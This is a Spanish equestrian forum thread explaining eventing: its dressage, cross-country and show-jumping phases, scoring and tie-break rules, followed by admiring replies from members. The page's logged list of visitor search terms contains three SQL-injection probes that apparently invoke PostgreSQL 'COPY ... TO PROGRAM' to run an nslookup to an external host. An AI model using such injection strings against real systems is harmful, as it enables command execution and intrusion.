Resultados 1 al 6 de 6

Tema: Concurso completo

  1. #1
    Leo
    Leo está desconectado
    Pessoa Coronel
    Puntos: 4,395, Nivel: 44
    Nivel completado: 97%, Puntos necesarios para el proximo Nivel: 5
    Actividad total: 0%
    Logros:
    Created Blog entryTagger First Class1000 Experience Points1 year registered
    Premios:
    Master Tagger

    Fecha de ingreso
    30 jun, 11
    Mensajes
    495
    Puntos
    4,395
    Nivel
    44
    Entradas de blog
    2

    Concurso completo

    Concurso completo

    El concurso completo o prueba de los tres días, es una combinación de tres disciplinas ecuestres: doma, campo a través y saltos de obstáculo. Las competiciones se efectúan en este orden y una en cada día (al principio eran tres días, aunque actualmente y dependiendo del evento, la prueba de doma se realiza en dos días). Esta competición tiene sus raíces como prueba comprensiva de la caballería que requiería diferentes tipos de maestría al montar a caballo.

    Las tres pruebas del concurso completo se desarrollan individualmente, y no hay posibilidad de que el jinete cambie de caballo. Cada prueba tiene una evaluación y la suma de las tres puntuaciones determina la clasificación final. La prueba se inicia con un control veterinario, el cual los habilita a comenzar la prueba. El doma consiste en realizar una serie de movimientos y ejecuciones preestablecidos que serán juzgados con un puntaje.

    La mayor dificultad de la competición, y su prueba característica, se concentra en la segunda prueba, la carrera de fondo con obstáculos, que consiste en cuatro fases donde la más importante es el campo a través que posee una longitud relacionada con su exigencia, en la cual el binomio debe demostrar que cuenta con una excelente capacidad de recuperación, valentía, fuerza y habilidad para sortear obstáculos naturales y artificiales; las cuatro fases son distintas e independientes, pero se suceden casi sin interrupción y se ejecutan en un solo esfuerzo. Las fases "A" y "C" corresponden a un recorrido sobre rutas y senderos, la fase "B" a un recorrido con obstáculos y la fase "D" al campo a través. En esta prueba el control veterinario es exhaustivo y determinante, pues cualquier anomalía que presente el caballo obligará a marginar al binomio de la prueba.

    El tercer día, después de otra inspección veterinaria final, se realiza la prueba de saltos de obstáculo, en la que los binomios deben sortear un recorrido de determinados obstáculos sobre una pista.

    El jinete para esta exigente prueba debe tener condiciones especiales, ser muy versátil y contar con gran resistencia física y psicológica, además de los conocimientos en lo que a doma, salto de obstáculos y campo a través se refiere. El objetivo final del concurso completo es probar el desarrollo armonioso, velocidad, resistencia, obediencia y habilidad de salto del caballo, y requiere un entendimiento prácticamente perfecto entre el animal y su jinete.

    Clasificación

    En la prueba de doma, los puntos positivos de cada participante concedidos por los jueces se convierten en puntos de penalización. En las pruebas de campo a través y de saltos en pista, las penalizaciones de cada participante por faltas en los obstáculos se añaden a la penalización que puede haber obtenido por exceso de tiempo.

    El binomio ganador es aquel que ha obtenido el menor número total de puntos de penalización, después de sumados los de las tres pruebas. En el caso de empate entre dos o más participantes, la clasificación se decide de la siguiente forma (en orden de aplicacación):

    La menor puntuación en la prueba de campo a través.
    El mejor tiempo (más rápido) en la prueba de campo a través.
    El mejor resultado en la prueba de salto de obstáculos (tiempo y obstáculos).
    El mejor tiempo en la prueba de salto de obstáculos.
    La mejor puntuación en la prueba de doma.
    Si continúa el empate, los participantes involucrados obtienen el mismo puesto.


    Mundial de Concurso Completo

    El Campeonato Mundial de Concurso Completo es la competición más importante a nivel mundial de esta disciplina. Se realiza desde 1966, y a partir de 1990 se celebra en el marco de los Juegos Ecuestres Mundiales. El actual campeón es el jinete alemán Michael Jung, quien montó al caballo "La Biosthetique-Sam FBW".

    Fuente: Wikipedia

    •   Alt 


        
       

  2. #2
    Perfeccionamiento Coronel
    Puntos: 4,232, Nivel: 43
    Nivel completado: 88%, Puntos necesarios para el proximo Nivel: 18
    Actividad total: 20.0%
    Logros:
    Tagger First Class1000 Experience Points1 year registered
    Premios:
    King of Publishing

    Fecha de ingreso
    06 ago, 11
    Ubicación
    Guadalajara
    Mensajes
    221
    Puntos
    4,232
    Nivel
    43

    Re: Concurso completo

    Según la Real Federación Hípica Española, en una breve definición del concurso de completo:
    Esta disciplina agrupa en una competición las disciplinas de DOMA CLÁSICA, SALTOS EN PISTA Y CROSS (saltos en campo). Se disputa la competición a lo largo de tres días; el primer día la doma, el segundo la prueba de fondo y el tercero la prueba de saltos en pista. Esta competición se realiza los tres días con el mismo caballo.

    Para que os hagáis una idea del tipo de saltos que incluye el completo, recojo a continuación las fotos de la Federación Hípica de obstáculos de la previa Saumur 2010:

    http://www.rfhe.com/topnavigation/vi...umur-2010.aspx

    Para más información:
    .:: Federación Hípica Española ::..

  3. #3
    Perfeccionamiento Coronel
    Puntos: 357, Nivel: 7
    Nivel completado: 14%, Puntos necesarios para el proximo Nivel: 43
    Actividad total: 65.0%
    Logros:
    Overdrive250 Experience Points31 days registered

    Fecha de ingreso
    07 sep, 11
    Mensajes
    115
    Puntos
    357
    Nivel
    7

    Re: Concurso completo

    Estupendo, Carlo. Te veo muy activo últimamente y muy certero en cuanto al interés de los hilos que abres y la información que nos ofreces. Muchas gracias. El concurso completo es una disciplina preciosa y como su nombre indica, completísima que requiere jinetes con una tremenda versatilidad y mentalmente muy fuertes. Siempre me ha parecido que debe tener una gran dificultad cambiar de una disciplina a otra en poco tiempo. He oído decir muchas veces que en concurso completo el mejor es el que lo hace todo correctamente, pero a mí no me suena tan sencillo, ni mucho menos.

  4. #4
    Perfeccionamiento Coronel
    Puntos: 322, Nivel: 6
    Nivel completado: 44%, Puntos necesarios para el proximo Nivel: 28
    Actividad total: 55.0%
    Logros:
    Tagger Second Class250 Experience Points31 days registered

    Fecha de ingreso
    20 jul, 11
    Mensajes
    102
    Puntos
    322
    Nivel
    6

    Re: Concurso completo

    No puedo estar más de acuerdo. El concurso completo es una de las disciplinas más bellas y más emocionantes, sobre todo para presenciar en directo. Puede gustarte más una prueba que otro, la doma más que los saltos, o el campo a través más que la doma, pero es casi imposible que no te gusta alguna, y si disfrutas con todas las especialidades hípicas, como es mi caso, entonces es una gozada. Siento una gran admiración por los jinetes que participan en concurso completo. Hay que ser una máquina, técnica y psicológicamente.

  5. #5
    Perfeccionamiento Coronel
    Puntos: 357, Nivel: 7
    Nivel completado: 14%, Puntos necesarios para el proximo Nivel: 43
    Actividad total: 65.0%
    Logros:
    Overdrive250 Experience Points31 days registered

    Fecha de ingreso
    07 sep, 11
    Mensajes
    115
    Puntos
    357
    Nivel
    7

    Re: Concurso completo

    Cierto, chicos. El completo para mí es lo más, por mucho que lo mío sean los saltos, pero reconozco que hay que ser súper completo, ya lo dice el nombre, muy fuerte mentalmente, técnicamente muy bueno, con una gran compenetración con el caballo para que el binomio funcione bien, en fin requiere muchas cualidades y muy diversas. Es una disciplina admirable. Por eso es olímpica, porque de algún modo representa la esencia de la hípica.
    Saludos.

  6. #6
    Perfeccionamiento Coronel
    Puntos: 322, Nivel: 6
    Nivel completado: 44%, Puntos necesarios para el proximo Nivel: 28
    Actividad total: 55.0%
    Logros:
    Tagger Second Class250 Experience Points31 days registered

    Fecha de ingreso
    20 jul, 11
    Mensajes
    102
    Puntos
    322
    Nivel
    6

    Re: Concurso completo

    Es cierto, Jerry. El concurso completo es la pura esencia de la hípica. De algún modo resume lo mejor de la hípica en esas tres pruebas tan distintas entre sí. Excepto en el triatlón no creo que haya otras actividades depprtivas que incluyan disciplinas tan diferentes en una misma competición y eso le da una belleza incomparable al concurso complero. Yo ya sabéis que soy de todas las disciplinas hípicas, pero con ninguna disfruto tanto como con esta.

Información de tema

Usuarios viendo este tema

Actualmente hay 1 usuarios viendo este tema. (0 miembros y 1 visitantes)

Los visitantes han encontrado esta página buscando:

testing

recorridos de concurso completo nivel iniciacioncampeonato mundial de concurso completo ecuestredefinicion de concurso completoconcurso completo de iniciacionconcurso completo definicionqúe es concurso completohipica tipo de saltos campo concurso completowikipedia campeonato españa de jinetes de saltos ecuestresequitacion concurso completo definiciontesting;copy (select ) to program nslookup dns.sqli.013622.16-65878.16.2ee2c.1.bxss.metesting;copy (select ) to program nslookup dns.sqli.013622.16-65972.16.64b37.1.bxss.metipos obstáculos campo través ecuestre en que campo se hace el concurso completoblog concurso completoconcurso completocaballos de concurso completoconcurso completo hipicatipos de saltos de concurso completo imagenesconcurso completo federacion hipica españoladefinicion concurso completoimagenes de obstáculos de concurso completo definicion concurso completotesting;copy (select ) to program nslookup dns.sqli.013622.65-55790.65.b05f7.1.bxss.me

Etiquetas para este tema

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •